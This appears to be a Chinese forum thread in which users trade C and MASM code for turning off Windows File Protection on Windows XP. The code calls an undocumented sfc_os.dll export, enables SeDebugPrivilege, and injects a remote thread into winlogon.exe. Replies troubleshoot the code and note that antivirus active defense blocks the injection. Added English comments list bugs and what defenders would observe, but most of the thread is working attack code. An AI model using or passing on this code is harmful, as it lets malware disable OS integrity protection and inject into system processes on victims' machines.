汗,找的代码都不全。 注入Winlogon要提升权限的。
这个远程线程不好使,直接调用sfc_os.dll的5号函数就可以了.
#include <windows.h>
#include <assert.h>
#include <stdio.h>
typedef DWORD (* SFPEXC)(DWORD, wchar_t *, DWORD);
/*
 * Entry point: loads sfc_os.dll, resolves the export at ordinal 5 and calls
 * it with the path given on the command line. The printed message says the
 * file is then left unprotected for one minute; what the third argument (-1,
 * passed as a DWORD, i.e. 0xFFFFFFFF) means is not established by this
 * listing. Exactly one file is affected per run.
 *
 * NOTE: every step is wrapped in assert(); under NDEBUG the LoadLibrary and
 * GetProcAddress calls are compiled out and sfp_exc is read uninitialized.
 * From a defender's view the observable events are an unrelated process
 * loading sfc_os.dll and resolving an export by ordinal rather than by name.
 */
void wmain(int argc, wchar_t **argv)
{
HMODULE sfc_os;
SFPEXC sfp_exc;
/* argv[1] is the only argument: the file path handed to the export */
assert(argc==2);
/* narrow-string LoadLibrary, so an ANSI build is assumed */
assert(sfc_os=LoadLibrary("sfc_os.dll"));
/* lookup by ordinal 5, not by exported name */
assert(sfp_exc=(SFPEXC) GetProcAddress(sfc_os, (char *) 5));
/* a zero return is treated as success */
assert(!sfp_exc(0, argv[1], -1));
wprintf(L"File %s should now be unprotected for 1 minute", argv[1]);
}
学习了!!!
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Shlwapi.h>
#include <sfc.h>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <tlhelp32.h>
#pragma comment(lib,"sfc.lib")
#pragma comment(lib,"shlwapi.lib") #pragma check_stack (off)
/*
 * Body of the thread started inside the target process by TerminateSfc.
 * The thread parameter is the function pointer to call. The raw bytes from
 * here up to after_thread_func are copied into the other process, so the
 * body has to stay free of anything address-dependent — presumably the
 * reason check_stack is switched off around these two functions.
 */
DWORD thread_func (FARPROC sfc_terminate)
{
sfc_terminate();
return 0;
}
/*
 * Empty marker: its address is used as the end of the byte range copied
 * from thread_func. This relies on the compiler placing the two functions
 * back to back, which the language does not guarantee.
 */
void after_thread_func(void)
{
}
#pragma check_stack
//调整权限
/*
 * Enables SeDebugPrivilege on the current process token.
 *
 * Returns 1 when AdjustTokenPrivileges reported success, 0 otherwise.
 *
 * NOTE: AdjustTokenPrivileges also returns nonzero when the privilege is not
 * held by the token (GetLastError() == ERROR_NOT_ALL_ASSIGNED), so a return
 * of 1 only means the call succeeded, not that the privilege was granted.
 * The token handle is closed on every path after it was opened.
 */
int AdjustPrivileges(void)
{
HANDLE token_handle;
int ret=0;
/* only TOKEN_ADJUST_PRIVILEGES is requested; no TOKEN_QUERY */
if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token_handle))
{
LUID luid;
if(LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
TOKEN_PRIVILEGES tk_priv;
tk_priv.PrivilegeCount=1;
tk_priv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tk_priv.Privileges[0].Luid=luid;
/* previous state is not requested (buffer length 0, NULL out-params) */
if(AdjustTokenPrivileges(token_handle,FALSE,&tk_priv,0,NULL,NULL)) ret=1;
}
CloseHandle(token_handle);
}
return ret;
}
//根据进程名取得进程号
/*
 * Looks up a process id by executable name using a Toolhelp snapshot.
 *
 * pname: image file name, compared case-insensitively with
 *        PROCESSENTRY32.szExeFile (file name only, no path).
 * Returns the id of the first matching process, or 0 when nothing matches
 * or the snapshot cannot be created (the `return (FALSE)` branch is 0).
 *
 * NOTE: stricmp is the non-standard spelling; MSVC also provides _stricmp.
 */
DWORD GetProcessID(const char* pname)
{
HANDLE hProcessSnap = NULL;
DWORD bRet = 0;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
return (FALSE);
/* dwSize has to be filled in before Process32First */
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do
{
/* first match wins; several processes may share the same name */
if (stricmp(pe32.szExeFile, pname) == 0) {
bRet = pe32.th32ProcessID;
break;
}
}while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle (hProcessSnap);
return (bRet);
}
//关闭windows文件保护
/*
 * Disables Windows File Protection by running the ordinal-2 export of
 * SFC_OS.DLL inside winlogon.exe: the bytes of thread_func are copied into
 * the target and a remote thread is started on that copy with the export
 * address as its argument.
 *
 * SeDebugPrivilege -> OpenProcess(PROCESS_ALL_ACCESS) on winlogon ->
 * VirtualAllocEx / WriteProcessMemory / CreateRemoteThread is the textbook
 * remote-thread injection sequence; a later reply on this page reports that
 * host intrusion-prevention software kills it before the thread ever runs,
 * and that sequence is what a defender should expect such products to log.
 *
 * Defects visible in this listing (left as-is):
 *  - wpid stays 0 when winlogon.exe is not found; OpenProcess then fails
 *    and the function silently exit(0)s.
 *  - the LoadLibrary result `sfc` is not checked before GetProcAddress, and
 *    sfc_terminate (possibly NULL) is passed on unchecked.
 *  - exit(0) on the two early failures reports success to the caller and
 *    makes the function unusable from anything but a throwaway main.
 *  - the export address is resolved in this process and presumably only
 *    valid in the target if the DLL is mapped at the same base — unverified.
 *  - on WAIT_TIMEOUT the remote memory is released while the thread may
 *    still be executing in it.
 */
void TerminateSfc()
{
DWORD wpid = 0;
wpid = GetProcessID("winlogon.exe");
HANDLE remote_thread;
/* neither sfc nor sfc_terminate is checked for NULL */
HMODULE sfc=LoadLibrary("SFC_OS.DLL");
FARPROC sfc_terminate=GetProcAddress(sfc, (char *) 2);
if (!AdjustPrivileges()) {
MessageBox(NULL, "调整权限错误", "", MB_OK);
exit(0);
}
/* full access to the target; also fails when wpid is 0 */
HANDLE process=OpenProcess(PROCESS_ALL_ACCESS, FALSE, wpid);
if(!process)
{
exit(0);
}
/* room for the bytes between thread_func and after_thread_func */
LPVOID remote_mem=VirtualAllocEx(process,NULL,(SIZE_T) ((char *)after_thread_func-(char *)thread_func),MEM_COMMIT,PAGE_READWRITE);
if(!remote_mem)
{
printf("Error while commiting memory in the remote process\n");
goto clean_up;
}
/* copy the function bytes; the bytes-written out-param is deliberately NULL */
if(!WriteProcessMemory(process,remote_mem,(char *) thread_func,(SIZE_T) ((char *)after_thread_func-(char *)thread_func),(SIZE_T *) 0))
{
/* %d with a DWORD argument; %lu would match GetLastError() */
printf("Error %d while writing to the remote process\n", GetLastError());
goto clean_up;
}
/* thread starts at the copied code, with the export address as its parameter */
remote_thread=CreateRemoteThread(process,NULL,0,(LPTHREAD_START_ROUTINE) remote_mem,(LPVOID) sfc_terminate,0,NULL);
if(!remote_thread)
{
printf("Error while creating remote thread in the process\n");
goto clean_up;
}
/* 10 s wait; on timeout the thread is abandoned and its memory freed below */
if(WaitForSingleObject(remote_thread, 10*1000)==WAIT_TIMEOUT)
printf("Timeout occured while waiting for the remote thread\n");
CloseHandle(remote_thread);
clean_up:
/* remote_mem is always assigned before any goto can reach this label */
if(remote_mem) VirtualFreeEx(process, remote_mem, 0, MEM_RELEASE);
CloseHandle(process);
}
sudami没看清楚吧,我传的是部分代码.
// 这里是提升Debug权限
if(!SetPrivilege(hProcessToken, SE_DEBUG_NAME, TRUE))
{
CloseHandle(hProcessToken);
CloseHandle(hMutex);
return FALSE;
}
5号函数我也知道,但只能针对一个文件,真晕~
感谢combojiang的回复, 我也觉得应该是要写入进程内存空间再执行, 但看了不少代码, 有asm的, Delphi的, 也有C++的, 都宣称在XP SP2下调试通过, 但都没有这部分调用.我先试试.再次感谢!
看了下,combojiang这样应该能行,我转份我下载的代码,为什么它能测试通过?
关闭SFC[文件保护]的源代码
WindowsXP Professional SP2测试通过.
.386
.Model Flat,StdCall
Option CaseMap :None
Include \Masm32\Include\Windows.inc
Include \Masm32\Include\User32.inc
Include \Masm32\Include\Shell32.inc
Include \Masm32\Include\Kernel32.inc
Include \Masm32\Include\Advapi32.inc
IncludeLib \Masm32\Lib\User32.lib
IncludeLib \Masm32\Lib\Shell32.lib
IncludeLib \Masm32\Lib\Kernel32.lib
IncludeLib \Masm32\Lib\Advapi32.lib
; Initialised data: the target image name compared against every snapshot
; entry in CloseSFC.
.Data
stProcess db "winlogon.exe",0
; Uninitialised data. Of these, only hToken, tkp and sdnv are referenced by
; the procedures below; hFile, dwProcessID, hProcess, lpLoadLibrary,
; lpDllName, szDllPath and szSysPath are declared but never used in the
; visible code.
.Data?
hFile dd ?
dwProcessID dd ?
hProcess dd ?
lpLoadLibrary dd ?
lpDllName dd ?
szDllPath db 260 dup(?)
szSysPath db 260 dup(?)
hToken dd ?
tkp TOKEN_PRIVILEGES<>
sdnv LUID <>
.Code
; Enables SeDebugPrivilege on the current process token.
; None of OpenProcessToken, LookupPrivilegeValue or AdjustTokenPrivileges
; is checked; CloseHandle runs unconditionally on whatever hToken holds.
EnableDebugPriv Proc
invoke GetCurrentProcess
invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
invoke LookupPrivilegeValue,0,CTEXT("SeDebugPrivilege"),addr sdnv
; one privilege entry; the LUID is copied in two 32-bit halves via m2m
mov tkp.PrivilegeCount,1
m2m tkp.Privileges.Luid.LowPart,sdnv.LowPart
m2m tkp.Privileges.Luid.HighPart,sdnv.HighPart
mov tkp.Privileges.Attributes,SE_PRIVILEGE_ENABLED
; previous state not requested; result not checked
invoke AdjustTokenPrivileges,hToken,FALSE,addr tkp,sizeof tkp,0,0
invoke CloseHandle,hToken
ret
EnableDebugPriv EndP
; Walks a Toolhelp process snapshot looking for winlogon.exe (stProcess) and,
; on the first entry it can open, starts a remote thread whose start address
; is the ordinal-2 export of sfc.dll. Nothing meaningful is returned in eax.
;
; Defects visible here (left as-is):
;  - the early ret inside the loop leaves @hSnapShot open, and @hProcess is
;    never closed on any path.
;  - the export address comes from sfc.dll mapped in THIS process and the
;    module is released with FreeLibrary before the address is used; this
;    presumably only works if the target maps sfc.dll at the same base.
;  - snapshot / Process32First failure is indistinguishable from "not found".
; Creating a remote thread in winlogon is the pattern host protection products
; key on; a later reply on this page reports it being blocked before it runs.
CloseSFC Proc
Local @stProcess:PROCESSENTRY32
Local @hSnapShot
Local @hProcess
Local @hSfc
; dwSize has to be filled in before Process32First
invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess
; snapshot handle is not tested against INVALID_HANDLE_VALUE
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax
invoke Process32First,@hSnapShot,addr @stProcess
.While eax
; case-insensitive compare of the entry's image name with "winlogon.exe"
invoke lstrcmpi,addr @stProcess.szExeFile,addr stProcess
.if eax == 0
; only the rights CreateRemoteThread needs, unlike PROCESS_ALL_ACCESS in the C listing above
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,FALSE,@stProcess.th32ProcessID
.if eax
mov @hProcess,eax
; resolve ordinal 2 in this process, then drop the module reference
invoke LoadLibrary,CTEXT("sfc.dll")
mov @hSfc,eax
invoke GetProcAddress,eax,2
push eax
invoke FreeLibrary,@hSfc
pop eax
.if eax
; start address = the export itself, no thread parameter
invoke CreateRemoteThread,@hProcess,0,0,eax,0,0,0
.if eax
invoke CloseHandle,eax
; early exit: @hSnapShot and @hProcess are leaked here
ret
.endif
.endif
.endif
.endif
invoke Process32Next,@hSnapShot,addr @stProcess
.EndW
invoke CloseHandle,@hSnapShot
ret
CloseSFC EndP
; Program entry: enable the debug privilege, attempt the injection, then exit
; with status 0 regardless of outcome (neither call's result is checked).
Start:
Call EnableDebugPriv
Call CloseSFC
invoke ExitProcess,0
End Start
因为你的代码中没有调用 AdjustTokenPrivileges 去调整权限啊.
远线程不好使, 还没运行就被主防扼杀了~~
找到原因了,sudami,不好意思,是我代码上传的不完整.
if(!SetPrivilege(hProcessToken, SE_DEBUG_NAME, TRUE))
{
CloseHandle(hProcessToken);
CloseHandle(hMutex);
return FALSE;
}
SetPrivilege是我自定义的函数,用于调整权限.呵呵:0
哈哈, 外国人写了篇文章,关于sfc的. 5种方法...
其实都差不多.俺把附件传上来吧, 给没有学习的同学一个参考,老技术了啊
哈哈
原来就是杀毒软件的主动防御作怪,亏得sudami的提醒.本来一个简单的东西被搞复杂了.